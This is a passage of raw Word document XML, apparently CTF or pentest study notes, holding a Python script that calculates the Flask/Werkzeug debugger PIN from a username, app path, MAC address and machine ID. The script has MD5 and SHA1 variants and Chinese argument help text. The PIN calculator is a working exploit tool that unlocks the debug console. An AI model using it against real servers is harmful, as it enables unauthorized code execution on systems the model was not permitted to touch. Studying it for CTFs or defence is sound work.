    <w:p w14:paraId="2C8CD091" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        h.update(b'pinsalt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A23D7" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        num = ('%09d' % int(h.hexdigest(), 16))[:9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ADCECA" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EE2F37F" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    rv = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A4405A" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if rv is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F45A838" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        for group_size in 5, 4, 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5338EC" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if len(num) % group_size == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB81A2" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29692421" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                              for x in range(0, len(num), group_size))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419BDEA1" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B89BC2" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3C3014" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            rv = num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D3780" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4216E0DF" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return rv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BDADC5" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41C0217A" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>def getSha1Pin(probably_public_bits, private_bits):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D12709" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    h = hashlib.sha1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD322FE" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for bit in chain(probably_public_bits, private_bits):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF22FE3" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if not bit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7823D820" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12273A77" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if isinstance(bit, str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FA9E02" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            bit = bit.encode("utf-8")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C5DBB" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        h.update(bit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F4D92C" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    h.update(b"cookiesalt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C7222" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F353A7" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    num = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDCE437" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if num is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142BF4D0" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        h.update(b"pinsalt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755B9984" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        num = f"{int(h.hexdigest(), 16):09d}"[:9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561D4182" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B66E913" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    rv = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608575D" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if rv is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C8658" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for group_size in 5, 4, 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308AA5AD" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if len(num) % group_size == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5202B12B" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                rv = "-".join(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5397DC" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    num[x: x + group_size].rjust(group_size, "0")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5B993" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                    for x in range(0, len(num), group_size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DD1066" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CAE449" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A48615" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB8AAFF" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            rv = num</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7084CA88" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315AB1B4" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return rv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F600840" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2229727E" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>def macToInt(mac):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A0D56" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    mac = mac.replace(":", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E739C" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return str(int(mac, 16))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B25F992" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE41DF8" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5E9B52" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse = argparse.ArgumentParser(description = "Calculate Python Flask Pin")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447965AA" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-u', '--username',required = True, type = str, help = "运行flask用户的用户名")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E128A" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-m', '--modname', type = str, default = "flask.app", help = "默认为flask.app")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6859DB32" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-a', '--appname', type = str, default = "Flask", help = "默认为Flask")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3B0DAB" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-p', '--path', required = True, type = str, help = "getattr(mod, '__file__', None):flask包中app.py的路径")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26882EB1" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-M', '--MAC', required = True, type = str, help = "MAC地址")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51740069" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    parse.add_argument('-i', '--machineId', type = str, default = "", help = "机器ID")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A409A41" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    args = parse.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6A8ED9" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F6EF80" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    probably_public_bits = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094EE515" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        args.username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B71977" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        args.modname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3558C4F8" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        args.appname,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298936A9" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        args.path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1002BFB3" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5480E262" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F79B7D2" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    private_bits = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8DD48C" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        macToInt(args.MAC),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1FD001" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        bytes(args.machineId, encoding = 'utf-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7BABB4" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3976DD40" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    md5Pin = getMd5Pin(probably_public_bits, private_bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2012B752" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    sha1Pin = getSha1Pin(probably_public_bits, private_bits)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F7AD1" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E755FB" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("Md5Pin:  " + md5Pin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA3E8D" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRDefault="00AE199C" w:rsidP="00AE199C">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("Sha1Pin:  " + sha1Pin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A981BC" w14:textId="77777777" w:rsidR="00AE199C" w:rsidRPr="000555F3" w:rsidRDefault="00AE199C" w:rsidP="000555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 w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E1B3FA" w14:textId="77777777" w:rsidR="000555F3" w:rsidRPr="000555F3" w:rsidRDefault="000555F3" w:rsidP="00280D8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000555F3" w:rsidRPr="000555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664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365D3"/>
    <w:rsid w:val="000555F3"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="00280D8A"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="00804955"/>
    <w:rsid w:val="00A57FB8"/>
    <w:rsid w:val="00AE199C"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00C17805"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00C7289F"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00EA3779"/>
    <w:rsid w:val="00F1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280D8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80D8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555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55F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1.200.138.180:10006/vipprice?token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504895347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磊 韩</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-01T08:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>